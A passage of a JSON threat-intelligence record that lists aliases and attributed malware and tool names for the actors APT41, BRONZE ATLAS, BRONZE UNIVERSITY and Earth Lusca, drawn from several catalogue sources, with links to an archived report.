"MISPGALAXY", "reports": null }, { "id": "c7d9878a-e691-4c6f-81ae-84fb115a1345", "created_at": "2022-10-25T16:07:23.359506Z", "updated_at": "2026-04-10T02:00:04.556639Z", "deleted_at": null, "main_name": "APT 41", "aliases": [ "BrazenBamboo", "Bronze Atlas", "Double Dragon", "Earth Baku", "G0096", "Grayfly", "Operation ColunmTK", "Operation CuckooBees", "Operation ShadowHammer", "Red Kelpie", "SparklingGoblin", "TA415", "TG-2633" ], "source_name": "ETDA:APT 41", "tools": [ "9002 RAT", "ADORE.XSEC", "ASPXSpy", "ASPXTool", "AceHash", "Agent.dhwf", "Agentemis", "AndroidControl", "AngryRebel", "AntSword", "BLUEBEAM", "Barlaiy", "BlackCoffee", "Bladabindi", "BleDoor", "CCleaner Backdoor", "CHINACHOPPER", "COLDJAVA", "China Chopper", "ChyNode", "Cobalt Strike", "CobaltStrike", "Crackshot", "CrossWalk", "CurveLast", "CurveLoad", "DAYJOB", "DBoxAgent", "DEADEYE", "DEADEYE.APPEND", "DEADEYE.EMBED", "DEPLOYLOG", "DIRTCLEANER", "DUSTTRAP", "Derusbi", "Destroy RAT", "DestroyRAT", "DodgeBox", "DragonEgg", "ELFSHELF", "EasyNight", "Farfli", "FunnySwitch", "Gh0st RAT", "Ghost RAT", "HDD Rootkit", "HDRoot", "HKDOOR", "HOMEUNIX", "HUI Loader", "HidraQ", "HighNoon", "HighNote", "Homux", "Hydraq", "Jorik", "Jumpall", "KEYPLUG", "Kaba", "Korplug", "LATELUNCH", "LOLBAS", "LOLBins", "LightSpy", "Living off the Land", "Lowkey", "McRAT", "MdmBot", "MessageTap", "Meterpreter", "Mimikatz", "MoonBounce", "MoonWalk", "Motnug", "Moudour", "Mydoor", "NTDSDump", "PACMAN", "PCRat", "PINEGROVE", "PNGRAT", "POISONPLUG", "POISONPLUG.SHADOW", "POTROAST", "PRIVATELOG", "PipeMon", "PlugX", "PortReuse", "ProxIP", "ROCKBOOT", "RbDoor", "RedDelta", "RedXOR", "RibDoor", "Roarur", "RouterGod", "SAGEHIRE", "SPARKLOG", "SQLULDR2", "STASHLOG", "SWEETCANDLE", "ScrambleCross", "Sensocode", "SerialVlogger", "ShadowHammer", "ShadowPad Winnti", "SinoChopper", "Skip-2.0", "SneakCross", "Sogu", "Speculoos", "Spyder", "StealthReacher", "StealthVector", "TERA", "TIDYELF", "TIGERPLUG", "TOMMYGUN", "TVT", "Thoper", "Voldemort", "WIDETONE", "WINNKIT", "WINTERLOVE", "Winnti", "WyrmSpy", "X-Door", "XDOOR", "XMRig", "XShellGhost", "Xamtrav", "ZXShell", "ZoxPNG", "certutil", "certutil.exe", "cobeacon", "gresim", "njRAT", "pwdump", "xDll" ], "source_id": "ETDA", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "24d5f393-f5c7-41a3-8d8f-2f9129a2925e", "created_at": "2024-11-20T02:00:03.66537Z", "updated_at": "2026-04-10T02:00:03.776928Z", "deleted_at": null, "main_name": "BrazenBamboo", "aliases": [], "source_name": "MISPGALAXY:BrazenBamboo", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434423, "ts_updated_at": 1775826768, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9b1d0db685cc28db58e242b341974a2c6f79cd0d.pdf", "text": "https://archive.orkl.eu/9b1d0db685cc28db58e242b341974a2c6f79cd0d.txt", "img": "https://archive.orkl.eu/9b1d0db685cc28db58e242b341974a2c6f79cd0d.jpg" } }